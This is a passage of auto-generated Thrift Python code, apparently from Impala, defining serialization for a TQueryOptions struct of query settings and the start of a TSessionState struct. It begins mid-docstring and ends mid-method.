max_io_buffers - allow_unsupported_formats - default_order_by_limit - debug_action - mem_limit - abort_on_default_limit_exceeded - compression_codec - hbase_caching - hbase_cache_blocks - parquet_file_size - explain_level - sync_ddl - request_pool - v_cpu_cores - reservation_request_timeout - disable_cached_reads - disable_outermost_topn - rm_initial_mem - query_timeout_s - buffer_pool_limit - appx_count_distinct - disable_unsafe_spills - seq_compression_mode - exec_single_node_rows_threshold - optimize_partition_key_scans - replica_preference - schedule_random_replica - scan_node_codegen_threshold - disable_streaming_preaggregations - runtime_filter_mode - runtime_bloom_filter_size - runtime_filter_wait_time_ms - disable_row_runtime_filtering - max_num_runtime_filters - parquet_annotate_strings_utf8 - parquet_fallback_schema_resolution - mt_dop - s3_skip_insert_staging - runtime_filter_min_size - runtime_filter_max_size - prefetch_mode - strict_mode - scratch_limit - enable_expr_rewrites - decimal_v2 - parquet_dictionary_filtering - parquet_array_resolution - parquet_read_statistics - default_join_distribution_mode - disable_codegen_rows_threshold - default_spillable_buffer_size - min_spillable_buffer_size - max_row_size """ thrift_spec = ( None, # 0 (1, TType.BOOL, 'abort_on_error', None, False, ), # 1 (2, TType.I32, 'max_errors', None, 100, ), # 2 (3, TType.BOOL, 'disable_codegen', None, False, ), # 3 (4, TType.I32, 'batch_size', None, 0, ), # 4 (5, TType.I32, 'num_nodes', None, 0, ), # 5 (6, TType.I64, 'max_scan_range_length', None, 0, ), # 6 (7, TType.I32, 'num_scanner_threads', None, 0, ), # 7 (8, TType.I32, 'max_io_buffers', None, 0, ), # 8 (9, TType.BOOL, 'allow_unsupported_formats', None, False, ), # 9 (10, TType.I64, 'default_order_by_limit', None, -1, ), # 10 (11, TType.STRING, 'debug_action', None, 
"", ), # 11 (12, TType.I64, 'mem_limit', None, 0, ), # 12 (13, TType.BOOL, 'abort_on_default_limit_exceeded', None, False, ), # 13 (14, TType.I32, 'compression_codec', None, None, ), # 14 (15, TType.I32, 'hbase_caching', None, 0, ), # 15 (16, TType.BOOL, 'hbase_cache_blocks', None, False, ), # 16 (17, TType.I64, 'parquet_file_size', None, 0, ), # 17 (18, TType.I32, 'explain_level', None, 1, ), # 18 (19, TType.BOOL, 'sync_ddl', None, False, ), # 19 (20, TType.STRING, 'request_pool', None, None, ), # 20 (21, TType.I16, 'v_cpu_cores', None, None, ), # 21 (22, TType.I64, 'reservation_request_timeout', None, None, ), # 22 (23, TType.BOOL, 'disable_cached_reads', None, False, ), # 23 (24, TType.BOOL, 'disable_outermost_topn', None, False, ), # 24 (25, TType.I64, 'rm_initial_mem', None, 0, ), # 25 (26, TType.I32, 'query_timeout_s', None, 0, ), # 26 (27, TType.I64, 'buffer_pool_limit', None, None, ), # 27 (28, TType.BOOL, 'appx_count_distinct', None, False, ), # 28 (29, TType.BOOL, 'disable_unsafe_spills', None, False, ), # 29 (30, TType.I32, 'seq_compression_mode', None, None, ), # 30 (31, TType.I32, 'exec_single_node_rows_threshold', None, 100, ), # 31 (32, TType.BOOL, 'optimize_partition_key_scans', None, False, ), # 32 (33, TType.I32, 'replica_preference', None, 0, ), # 33 (34, TType.BOOL, 'schedule_random_replica', None, False, ), # 34 (35, TType.I64, 'scan_node_codegen_threshold', None, 1800000, ), # 35 (36, TType.BOOL, 'disable_streaming_preaggregations', None, False, ), # 36 (37, TType.I32, 'runtime_filter_mode', None, 2, ), # 37 (38, TType.I32, 'runtime_bloom_filter_size', None, 1048576, ), # 38 (39, TType.I32, 'runtime_filter_wait_time_ms', None, 0, ), # 39 (40, TType.BOOL, 'disable_row_runtime_filtering', None, False, ), # 40 (41, TType.I32, 'max_num_runtime_filters', None, 10, ), # 41 (42, TType.BOOL, 'parquet_annotate_strings_utf8', None, False, ), # 42 (43, TType.I32, 'parquet_fallback_schema_resolution', None, 0, ), # 43 (44, TType.I32, 'mt_dop', None, None, ), # 44 (45, TType.BOOL, 's3_skip_insert_staging', None, True, ), # 45 (46, TType.I32, 'runtime_filter_min_size', None, 1048576, ), # 46 (47, TType.I32, 'runtime_filter_max_size', None, 16777216, ), # 47 (48, TType.I32, 'prefetch_mode', None, 1, ), # 48 (49, TType.BOOL, 'strict_mode', None, False, ), # 49 (50, TType.I64, 'scratch_limit', None, -1, ), # 50 (51, TType.BOOL, 'enable_expr_rewrites', None, True, ), # 51 (52, TType.BOOL, 'decimal_v2', None, False, ), # 52 (53, TType.BOOL, 'parquet_dictionary_filtering', None, True, ), # 53 (54, TType.I32, 'parquet_array_resolution', None, 2, ), # 54 (55, TType.BOOL, 'parquet_read_statistics', None, True, ), # 55 (56, TType.I32, 'default_join_distribution_mode', None, 0, ), # 56 (57, TType.I32, 'disable_codegen_rows_threshold', None, 50000, ), # 57 (58, TType.I64, 'default_spillable_buffer_size', None, 2097152, ), # 58 (59, TType.I64, 'min_spillable_buffer_size', None, 65536, ), # 59 (60, TType.I64, 'max_row_size', None, 524288, ), # 60 ) def __init__(self, abort_on_error=thrift_spec[1][4], max_errors=thrift_spec[2][4], disable_codegen=thrift_spec[3][4], batch_size=thrift_spec[4][4], num_nodes=thrift_spec[5][4], max_scan_range_length=thrift_spec[6][4], num_scanner_threads=thrift_spec[7][4], max_io_buffers=thrift_spec[8][4], allow_unsupported_formats=thrift_spec[9][4], default_order_by_limit=thrift_spec[10][4], debug_action=thrift_spec[11][4], mem_limit=thrift_spec[12][4], abort_on_default_limit_exceeded=thrift_spec[13][4], compression_codec=None, hbase_caching=thrift_spec[15][4], 
hbase_cache_blocks=thrift_spec[16][4], parquet_file_size=thrift_spec[17][4], explain_level=thrift_spec[18][4], sync_ddl=thrift_spec[19][4], request_pool=None, v_cpu_cores=None, reservation_request_timeout=None, disable_cached_reads=thrift_spec[23][4], disable_outermost_topn=thrift_spec[24][4], rm_initial_mem=thrift_spec[25][4], query_timeout_s=thrift_spec[26][4], buffer_pool_limit=None, appx_count_distinct=thrift_spec[28][4], disable_unsafe_spills=thrift_spec[29][4], seq_compression_mode=None, exec_single_node_rows_threshold=thrift_spec[31][4], optimize_partition_key_scans=thrift_spec[32][4], replica_preference=thrift_spec[33][4], schedule_random_replica=thrift_spec[34][4], scan_node_codegen_threshold=thrift_spec[35][4], disable_streaming_preaggregations=thrift_spec[36][4], runtime_filter_mode=thrift_spec[37][4], runtime_bloom_filter_size=thrift_spec[38][4], runtime_filter_wait_time_ms=thrift_spec[39][4], disable_row_runtime_filtering=thrift_spec[40][4], max_num_runtime_filters=thrift_spec[41][4], parquet_annotate_strings_utf8=thrift_spec[42][4], parquet_fallback_schema_resolution=thrift_spec[43][4], mt_dop=None, s3_skip_insert_staging=thrift_spec[45][4], runtime_filter_min_size=thrift_spec[46][4], runtime_filter_max_size=thrift_spec[47][4], prefetch_mode=thrift_spec[48][4], strict_mode=thrift_spec[49][4], scratch_limit=thrift_spec[50][4], enable_expr_rewrites=thrift_spec[51][4], decimal_v2=thrift_spec[52][4], parquet_dictionary_filtering=thrift_spec[53][4], parquet_array_resolution=thrift_spec[54][4], parquet_read_statistics=thrift_spec[55][4], default_join_distribution_mode=thrift_spec[56][4], disable_codegen_rows_threshold=thrift_spec[57][4], default_spillable_buffer_size=thrift_spec[58][4], min_spillable_buffer_size=thrift_spec[59][4], max_row_size=thrift_spec[60][4],): self.abort_on_error = abort_on_error self.max_errors = max_errors self.disable_codegen = disable_codegen self.batch_size = batch_size self.num_nodes = num_nodes self.max_scan_range_length = max_scan_range_length self.num_scanner_threads = num_scanner_threads self.max_io_buffers = max_io_buffers self.allow_unsupported_formats = allow_unsupported_formats self.default_order_by_limit = default_order_by_limit self.debug_action = debug_action self.mem_limit = mem_limit self.abort_on_default_limit_exceeded = abort_on_default_limit_exceeded self.compression_codec = compression_codec self.hbase_caching = hbase_caching self.hbase_cache_blocks = hbase_cache_blocks self.parquet_file_size = parquet_file_size self.explain_level = explain_level self.sync_ddl = sync_ddl self.request_pool = request_pool self.v_cpu_cores = v_cpu_cores self.reservation_request_timeout = reservation_request_timeout self.disable_cached_reads = disable_cached_reads self.disable_outermost_topn = disable_outermost_topn self.rm_initial_mem = rm_initial_mem self.query_timeout_s = query_timeout_s self.buffer_pool_limit = buffer_pool_limit self.appx_count_distinct = appx_count_distinct self.disable_unsafe_spills = disable_unsafe_spills self.seq_compression_mode = seq_compression_mode self.exec_single_node_rows_threshold = exec_single_node_rows_threshold self.optimize_partition_key_scans = optimize_partition_key_scans self.replica_preference = replica_preference self.schedule_random_replica = schedule_random_replica self.scan_node_codegen_threshold = scan_node_codegen_threshold self.disable_streaming_preaggregations = disable_streaming_preaggregations self.runtime_filter_mode = runtime_filter_mode self.runtime_bloom_filter_size = runtime_bloom_filter_size 
self.runtime_filter_wait_time_ms = runtime_filter_wait_time_ms self.disable_row_runtime_filtering = disable_row_runtime_filtering self.max_num_runtime_filters = max_num_runtime_filters self.parquet_annotate_strings_utf8 = parquet_annotate_strings_utf8 self.parquet_fallback_schema_resolution = parquet_fallback_schema_resolution self.mt_dop = mt_dop self.s3_skip_insert_staging = s3_skip_insert_staging self.runtime_filter_min_size = runtime_filter_min_size self.runtime_filter_max_size = runtime_filter_max_size self.prefetch_mode = prefetch_mode self.strict_mode = strict_mode self.scratch_limit = scratch_limit self.enable_expr_rewrites = enable_expr_rewrites self.decimal_v2 = decimal_v2 self.parquet_dictionary_filtering = parquet_dictionary_filtering self.parquet_array_resolution = parquet_array_resolution self.parquet_read_statistics = parquet_read_statistics self.default_join_distribution_mode = default_join_distribution_mode self.disable_codegen_rows_threshold = disable_codegen_rows_threshold self.default_spillable_buffer_size = default_spillable_buffer_size self.min_spillable_buffer_size = min_spillable_buffer_size self.max_row_size = max_row_size def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.BOOL: self.abort_on_error = iprot.readBool(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.max_errors = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.BOOL: self.disable_codegen = iprot.readBool(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.I32: self.batch_size = iprot.readI32(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.I32: self.num_nodes = iprot.readI32(); else: iprot.skip(ftype) elif fid == 6: if ftype == TType.I64: self.max_scan_range_length = iprot.readI64(); else: iprot.skip(ftype) elif fid == 7: if ftype == TType.I32: self.num_scanner_threads = iprot.readI32(); else: iprot.skip(ftype) elif fid == 8: if ftype == TType.I32: self.max_io_buffers = iprot.readI32(); else: iprot.skip(ftype) elif fid == 9: if ftype == TType.BOOL: self.allow_unsupported_formats = iprot.readBool(); else: iprot.skip(ftype) elif fid == 10: if ftype == TType.I64: self.default_order_by_limit = iprot.readI64(); else: iprot.skip(ftype) elif fid == 11: if ftype == TType.STRING: self.debug_action = iprot.readString(); else: iprot.skip(ftype) elif fid == 12: if ftype == TType.I64: self.mem_limit = iprot.readI64(); else: iprot.skip(ftype) elif fid == 13: if ftype == TType.BOOL: self.abort_on_default_limit_exceeded = iprot.readBool(); else: iprot.skip(ftype) elif fid == 14: if ftype == TType.I32: self.compression_codec = iprot.readI32(); else: iprot.skip(ftype) elif fid == 15: if ftype == TType.I32: self.hbase_caching = iprot.readI32(); else: iprot.skip(ftype) elif fid == 16: if ftype == TType.BOOL: self.hbase_cache_blocks = iprot.readBool(); else: iprot.skip(ftype) elif fid == 17: if ftype == TType.I64: self.parquet_file_size = iprot.readI64(); else: iprot.skip(ftype) elif fid == 18: if ftype == TType.I32: self.explain_level = iprot.readI32(); else: iprot.skip(ftype) elif fid == 19: if ftype == TType.BOOL: self.sync_ddl = iprot.readBool(); else: iprot.skip(ftype) elif 
fid == 20: if ftype == TType.STRING: self.request_pool = iprot.readString(); else: iprot.skip(ftype) elif fid == 21: if ftype == TType.I16: self.v_cpu_cores = iprot.readI16(); else: iprot.skip(ftype) elif fid == 22: if ftype == TType.I64: self.reservation_request_timeout = iprot.readI64(); else: iprot.skip(ftype) elif fid == 23: if ftype == TType.BOOL: self.disable_cached_reads = iprot.readBool(); else: iprot.skip(ftype) elif fid == 24: if ftype == TType.BOOL: self.disable_outermost_topn = iprot.readBool(); else: iprot.skip(ftype) elif fid == 25: if ftype == TType.I64: self.rm_initial_mem = iprot.readI64(); else: iprot.skip(ftype) elif fid == 26: if ftype == TType.I32: self.query_timeout_s = iprot.readI32(); else: iprot.skip(ftype) elif fid == 27: if ftype == TType.I64: self.buffer_pool_limit = iprot.readI64(); else: iprot.skip(ftype) elif fid == 28: if ftype == TType.BOOL: self.appx_count_distinct = iprot.readBool(); else: iprot.skip(ftype) elif fid == 29: if ftype == TType.BOOL: self.disable_unsafe_spills = iprot.readBool(); else: iprot.skip(ftype) elif fid == 30: if ftype == TType.I32: self.seq_compression_mode = iprot.readI32(); else: iprot.skip(ftype) elif fid == 31: if ftype == TType.I32: self.exec_single_node_rows_threshold = iprot.readI32(); else: iprot.skip(ftype) elif fid == 32: if ftype == TType.BOOL: self.optimize_partition_key_scans = iprot.readBool(); else: iprot.skip(ftype) elif fid == 33: if ftype == TType.I32: self.replica_preference = iprot.readI32(); else: iprot.skip(ftype) elif fid == 34: if ftype == TType.BOOL: self.schedule_random_replica = iprot.readBool(); else: iprot.skip(ftype) elif fid == 35: if ftype == TType.I64: self.scan_node_codegen_threshold = iprot.readI64(); else: iprot.skip(ftype) elif fid == 36: if ftype == TType.BOOL: self.disable_streaming_preaggregations = iprot.readBool(); else: iprot.skip(ftype) elif fid == 37: if ftype == TType.I32: self.runtime_filter_mode = iprot.readI32(); else: iprot.skip(ftype) elif fid == 38: if ftype == TType.I32: self.runtime_bloom_filter_size = iprot.readI32(); else: iprot.skip(ftype) elif fid == 39: if ftype == TType.I32: self.runtime_filter_wait_time_ms = iprot.readI32(); else: iprot.skip(ftype) elif fid == 40: if ftype == TType.BOOL: self.disable_row_runtime_filtering = iprot.readBool(); else: iprot.skip(ftype) elif fid == 41: if ftype == TType.I32: self.max_num_runtime_filters = iprot.readI32(); else: iprot.skip(ftype) elif fid == 42: if ftype == TType.BOOL: self.parquet_annotate_strings_utf8 = iprot.readBool(); else: iprot.skip(ftype) elif fid == 43: if ftype == TType.I32: self.parquet_fallback_schema_resolution = iprot.readI32(); else: iprot.skip(ftype) elif fid == 44: if ftype == TType.I32: self.mt_dop = iprot.readI32(); else: iprot.skip(ftype) elif fid == 45: if ftype == TType.BOOL: self.s3_skip_insert_staging = iprot.readBool(); else: iprot.skip(ftype) elif fid == 46: if ftype == TType.I32: self.runtime_filter_min_size = iprot.readI32(); else: iprot.skip(ftype) elif fid == 47: if ftype == TType.I32: self.runtime_filter_max_size = iprot.readI32(); else: iprot.skip(ftype) elif fid == 48: if ftype == TType.I32: self.prefetch_mode = iprot.readI32(); else: iprot.skip(ftype) elif fid == 49: if ftype == TType.BOOL: self.strict_mode = iprot.readBool(); else: iprot.skip(ftype) elif fid == 50: if ftype == TType.I64: self.scratch_limit = iprot.readI64(); else: iprot.skip(ftype) elif fid == 51: if ftype == TType.BOOL: self.enable_expr_rewrites = iprot.readBool(); else: iprot.skip(ftype) elif fid == 52: if ftype == 
TType.BOOL: self.decimal_v2 = iprot.readBool(); else: iprot.skip(ftype) elif fid == 53: if ftype == TType.BOOL: self.parquet_dictionary_filtering = iprot.readBool(); else: iprot.skip(ftype) elif fid == 54: if ftype == TType.I32: self.parquet_array_resolution = iprot.readI32(); else: iprot.skip(ftype) elif fid == 55: if ftype == TType.BOOL: self.parquet_read_statistics = iprot.readBool(); else: iprot.skip(ftype) elif fid == 56: if ftype == TType.I32: self.default_join_distribution_mode = iprot.readI32(); else: iprot.skip(ftype) elif fid == 57: if ftype == TType.I32: self.disable_codegen_rows_threshold = iprot.readI32(); else: iprot.skip(ftype) elif fid == 58: if ftype == TType.I64: self.default_spillable_buffer_size = iprot.readI64(); else: iprot.skip(ftype) elif fid == 59: if ftype == TType.I64: self.min_spillable_buffer_size = iprot.readI64(); else: iprot.skip(ftype) elif fid == 60: if ftype == TType.I64: self.max_row_size = iprot.readI64(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TQueryOptions') if self.abort_on_error is not None: oprot.writeFieldBegin('abort_on_error', TType.BOOL, 1) oprot.writeBool(self.abort_on_error) oprot.writeFieldEnd() if self.max_errors is not None: oprot.writeFieldBegin('max_errors', TType.I32, 2) oprot.writeI32(self.max_errors) oprot.writeFieldEnd() if self.disable_codegen is not None: oprot.writeFieldBegin('disable_codegen', TType.BOOL, 3) oprot.writeBool(self.disable_codegen) oprot.writeFieldEnd() if self.batch_size is not None: oprot.writeFieldBegin('batch_size', TType.I32, 4) oprot.writeI32(self.batch_size) oprot.writeFieldEnd() if self.num_nodes is not None: oprot.writeFieldBegin('num_nodes', TType.I32, 5) oprot.writeI32(self.num_nodes) oprot.writeFieldEnd() if self.max_scan_range_length is not None: oprot.writeFieldBegin('max_scan_range_length', TType.I64, 6) oprot.writeI64(self.max_scan_range_length) oprot.writeFieldEnd() if self.num_scanner_threads is not None: oprot.writeFieldBegin('num_scanner_threads', TType.I32, 7) oprot.writeI32(self.num_scanner_threads) oprot.writeFieldEnd() if self.max_io_buffers is not None: oprot.writeFieldBegin('max_io_buffers', TType.I32, 8) oprot.writeI32(self.max_io_buffers) oprot.writeFieldEnd() if self.allow_unsupported_formats is not None: oprot.writeFieldBegin('allow_unsupported_formats', TType.BOOL, 9) oprot.writeBool(self.allow_unsupported_formats) oprot.writeFieldEnd() if self.default_order_by_limit is not None: oprot.writeFieldBegin('default_order_by_limit', TType.I64, 10) oprot.writeI64(self.default_order_by_limit) oprot.writeFieldEnd() if self.debug_action is not None: oprot.writeFieldBegin('debug_action', TType.STRING, 11) oprot.writeString(self.debug_action) oprot.writeFieldEnd() if self.mem_limit is not None: oprot.writeFieldBegin('mem_limit', TType.I64, 12) oprot.writeI64(self.mem_limit) oprot.writeFieldEnd() if self.abort_on_default_limit_exceeded is not None: oprot.writeFieldBegin('abort_on_default_limit_exceeded', TType.BOOL, 13) oprot.writeBool(self.abort_on_default_limit_exceeded) oprot.writeFieldEnd() if self.compression_codec is not None: oprot.writeFieldBegin('compression_codec', TType.I32, 14) oprot.writeI32(self.compression_codec) oprot.writeFieldEnd() if self.hbase_caching is not None: 
oprot.writeFieldBegin('hbase_caching', TType.I32, 15) oprot.writeI32(self.hbase_caching) oprot.writeFieldEnd() if self.hbase_cache_blocks is not None: oprot.writeFieldBegin('hbase_cache_blocks', TType.BOOL, 16) oprot.writeBool(self.hbase_cache_blocks) oprot.writeFieldEnd() if self.parquet_file_size is not None: oprot.writeFieldBegin('parquet_file_size', TType.I64, 17) oprot.writeI64(self.parquet_file_size) oprot.writeFieldEnd() if self.explain_level is not None: oprot.writeFieldBegin('explain_level', TType.I32, 18) oprot.writeI32(self.explain_level) oprot.writeFieldEnd() if self.sync_ddl is not None: oprot.writeFieldBegin('sync_ddl', TType.BOOL, 19) oprot.writeBool(self.sync_ddl) oprot.writeFieldEnd() if self.request_pool is not None: oprot.writeFieldBegin('request_pool', TType.STRING, 20) oprot.writeString(self.request_pool) oprot.writeFieldEnd() if self.v_cpu_cores is not None: oprot.writeFieldBegin('v_cpu_cores', TType.I16, 21) oprot.writeI16(self.v_cpu_cores) oprot.writeFieldEnd() if self.reservation_request_timeout is not None: oprot.writeFieldBegin('reservation_request_timeout', TType.I64, 22) oprot.writeI64(self.reservation_request_timeout) oprot.writeFieldEnd() if self.disable_cached_reads is not None: oprot.writeFieldBegin('disable_cached_reads', TType.BOOL, 23) oprot.writeBool(self.disable_cached_reads) oprot.writeFieldEnd() if self.disable_outermost_topn is not None: oprot.writeFieldBegin('disable_outermost_topn', TType.BOOL, 24) oprot.writeBool(self.disable_outermost_topn) oprot.writeFieldEnd() if self.rm_initial_mem is not None: oprot.writeFieldBegin('rm_initial_mem', TType.I64, 25) oprot.writeI64(self.rm_initial_mem) oprot.writeFieldEnd() if self.query_timeout_s is not None: oprot.writeFieldBegin('query_timeout_s', TType.I32, 26) oprot.writeI32(self.query_timeout_s) oprot.writeFieldEnd() if self.buffer_pool_limit is not None: oprot.writeFieldBegin('buffer_pool_limit', TType.I64, 27) oprot.writeI64(self.buffer_pool_limit) oprot.writeFieldEnd() if self.appx_count_distinct is not None: oprot.writeFieldBegin('appx_count_distinct', TType.BOOL, 28) oprot.writeBool(self.appx_count_distinct) oprot.writeFieldEnd() if self.disable_unsafe_spills is not None: oprot.writeFieldBegin('disable_unsafe_spills', TType.BOOL, 29) oprot.writeBool(self.disable_unsafe_spills) oprot.writeFieldEnd() if self.seq_compression_mode is not None: oprot.writeFieldBegin('seq_compression_mode', TType.I32, 30) oprot.writeI32(self.seq_compression_mode) oprot.writeFieldEnd() if self.exec_single_node_rows_threshold is not None: oprot.writeFieldBegin('exec_single_node_rows_threshold', TType.I32, 31) oprot.writeI32(self.exec_single_node_rows_threshold) oprot.writeFieldEnd() if self.optimize_partition_key_scans is not None: oprot.writeFieldBegin('optimize_partition_key_scans', TType.BOOL, 32) oprot.writeBool(self.optimize_partition_key_scans) oprot.writeFieldEnd() if self.replica_preference is not None: oprot.writeFieldBegin('replica_preference', TType.I32, 33) oprot.writeI32(self.replica_preference) oprot.writeFieldEnd() if self.schedule_random_replica is not None: oprot.writeFieldBegin('schedule_random_replica', TType.BOOL, 34) oprot.writeBool(self.schedule_random_replica) oprot.writeFieldEnd() if self.scan_node_codegen_threshold is not None: oprot.writeFieldBegin('scan_node_codegen_threshold', TType.I64, 35) oprot.writeI64(self.scan_node_codegen_threshold) oprot.writeFieldEnd() if self.disable_streaming_preaggregations is not None: oprot.writeFieldBegin('disable_streaming_preaggregations', TType.BOOL, 36) 
oprot.writeBool(self.disable_streaming_preaggregations) oprot.writeFieldEnd() if self.runtime_filter_mode is not None: oprot.writeFieldBegin('runtime_filter_mode', TType.I32, 37) oprot.writeI32(self.runtime_filter_mode) oprot.writeFieldEnd() if self.runtime_bloom_filter_size is not None: oprot.writeFieldBegin('runtime_bloom_filter_size', TType.I32, 38) oprot.writeI32(self.runtime_bloom_filter_size) oprot.writeFieldEnd() if self.runtime_filter_wait_time_ms is not None: oprot.writeFieldBegin('runtime_filter_wait_time_ms', TType.I32, 39) oprot.writeI32(self.runtime_filter_wait_time_ms) oprot.writeFieldEnd() if self.disable_row_runtime_filtering is not None: oprot.writeFieldBegin('disable_row_runtime_filtering', TType.BOOL, 40) oprot.writeBool(self.disable_row_runtime_filtering) oprot.writeFieldEnd() if self.max_num_runtime_filters is not None: oprot.writeFieldBegin('max_num_runtime_filters', TType.I32, 41) oprot.writeI32(self.max_num_runtime_filters) oprot.writeFieldEnd() if self.parquet_annotate_strings_utf8 is not None: oprot.writeFieldBegin('parquet_annotate_strings_utf8', TType.BOOL, 42) oprot.writeBool(self.parquet_annotate_strings_utf8) oprot.writeFieldEnd() if self.parquet_fallback_schema_resolution is not None: oprot.writeFieldBegin('parquet_fallback_schema_resolution', TType.I32, 43) oprot.writeI32(self.parquet_fallback_schema_resolution) oprot.writeFieldEnd() if self.mt_dop is not None: oprot.writeFieldBegin('mt_dop', TType.I32, 44) oprot.writeI32(self.mt_dop) oprot.writeFieldEnd() if self.s3_skip_insert_staging is not None: oprot.writeFieldBegin('s3_skip_insert_staging', TType.BOOL, 45) oprot.writeBool(self.s3_skip_insert_staging) oprot.writeFieldEnd() if self.runtime_filter_min_size is not None: oprot.writeFieldBegin('runtime_filter_min_size', TType.I32, 46) oprot.writeI32(self.runtime_filter_min_size) oprot.writeFieldEnd() if self.runtime_filter_max_size is not None: oprot.writeFieldBegin('runtime_filter_max_size', TType.I32, 47) oprot.writeI32(self.runtime_filter_max_size) oprot.writeFieldEnd() if self.prefetch_mode is not None: oprot.writeFieldBegin('prefetch_mode', TType.I32, 48) oprot.writeI32(self.prefetch_mode) oprot.writeFieldEnd() if self.strict_mode is not None: oprot.writeFieldBegin('strict_mode', TType.BOOL, 49) oprot.writeBool(self.strict_mode) oprot.writeFieldEnd() if self.scratch_limit is not None: oprot.writeFieldBegin('scratch_limit', TType.I64, 50) oprot.writeI64(self.scratch_limit) oprot.writeFieldEnd() if self.enable_expr_rewrites is not None: oprot.writeFieldBegin('enable_expr_rewrites', TType.BOOL, 51) oprot.writeBool(self.enable_expr_rewrites) oprot.writeFieldEnd() if self.decimal_v2 is not None: oprot.writeFieldBegin('decimal_v2', TType.BOOL, 52) oprot.writeBool(self.decimal_v2) oprot.writeFieldEnd() if self.parquet_dictionary_filtering is not None: oprot.writeFieldBegin('parquet_dictionary_filtering', TType.BOOL, 53) oprot.writeBool(self.parquet_dictionary_filtering) oprot.writeFieldEnd() if self.parquet_array_resolution is not None: oprot.writeFieldBegin('parquet_array_resolution', TType.I32, 54) oprot.writeI32(self.parquet_array_resolution) oprot.writeFieldEnd() if self.parquet_read_statistics is not None: oprot.writeFieldBegin('parquet_read_statistics', TType.BOOL, 55) oprot.writeBool(self.parquet_read_statistics) oprot.writeFieldEnd() if self.default_join_distribution_mode is not None: oprot.writeFieldBegin('default_join_distribution_mode', TType.I32, 56) oprot.writeI32(self.default_join_distribution_mode) oprot.writeFieldEnd() if 
self.disable_codegen_rows_threshold is not None: oprot.writeFieldBegin('disable_codegen_rows_threshold', TType.I32, 57) oprot.writeI32(self.disable_codegen_rows_threshold) oprot.writeFieldEnd() if self.default_spillable_buffer_size is not None: oprot.writeFieldBegin('default_spillable_buffer_size', TType.I64, 58) oprot.writeI64(self.default_spillable_buffer_size) oprot.writeFieldEnd() if self.min_spillable_buffer_size is not None: oprot.writeFieldBegin('min_spillable_buffer_size', TType.I64, 59) oprot.writeI64(self.min_spillable_buffer_size) oprot.writeFieldEnd() if self.max_row_size is not None: oprot.writeFieldBegin('max_row_size', TType.I64, 60) oprot.writeI64(self.max_row_size) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TSessionState: """ Attributes: - session_id - session_type - database - connected_user - delegated_user - network_address - kudu_latest_observed_ts """ thrift_spec = ( None, # 0 (1, TType.STRING, 'database', None, None, ), # 1 (2, TType.STRING, 'connected_user', None, None, ), # 2 (3, TType.STRUCT, 'session_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 3 (4, TType.STRUCT, 'network_address', (Types.ttypes.TNetworkAddress, Types.ttypes.TNetworkAddress.thrift_spec), None, ), # 4 (5, TType.I32, 'session_type', None, None, ), # 5 (6, TType.STRING, 'delegated_user', None, None, ), # 6 (7, TType.I64, 'kudu_latest_observed_ts', None, None, ), # 7 ) def __init__(self, session_id=None, session_type=None, database=None, connected_user=None, delegated_user=None, network_address=None, kudu_latest_observed_ts=None,): self.session_id = session_id self.session_type = session_type self.database = database self.connected_user = connected_user self.delegated_user = delegated_user self.network_address = network_address self.kudu_latest_observed_ts = kudu_latest_observed_ts def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 3: if ftype == TType.STRUCT: self.session_id = Types.ttypes.TUniqueId() self.session_id.read(iprot) else: iprot.skip(ftype) elif fid == 5: if ftype == TType.I32: self.session_type = iprot.readI32(); else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRING: self.database = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.connected_user = iprot.readString(); else: iprot.skip(ftype) elif fid == 6: if ftype == TType.STRING: self.delegated_user = iprot.readString(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.network_address = Types.ttypes.TNetworkAddress() self.network_address.read(iprot) else: iprot.skip(ftype) elif fid == 7: if ftype == TType.I64: self.kudu_latest_observed_ts = iprot.readI64(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == 
TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TSessionState') if self.database is not None: oprot.writeFieldBegin('database', TType.STRING, 1) oprot.writeString(self.database) oprot.writeFieldEnd() if self.connected_user is not None: oprot.writeFieldBegin('connected_user', TType.STRING, 2) oprot.writeString(self.connected_user) oprot.writeFieldEnd() if self.session_id is not None: oprot.writeFieldBegin('session_id', TType.STRUCT, 3) self.session_id.write(oprot) oprot.writeFieldEnd() if self.network_address is not None: oprot.writeFieldBegin('network_address', TType.STRUCT, 4) self.network_address.write(oprot) oprot.writeFieldEnd() if self.session_type is not None: oprot.writeFieldBegin('session_type', TType.I32, 5) oprot.writeI32(self.session_type) oprot.writeFieldEnd() if self.delegated_user is not None: oprot.writeFieldBegin('delegated_user', TType.STRING, 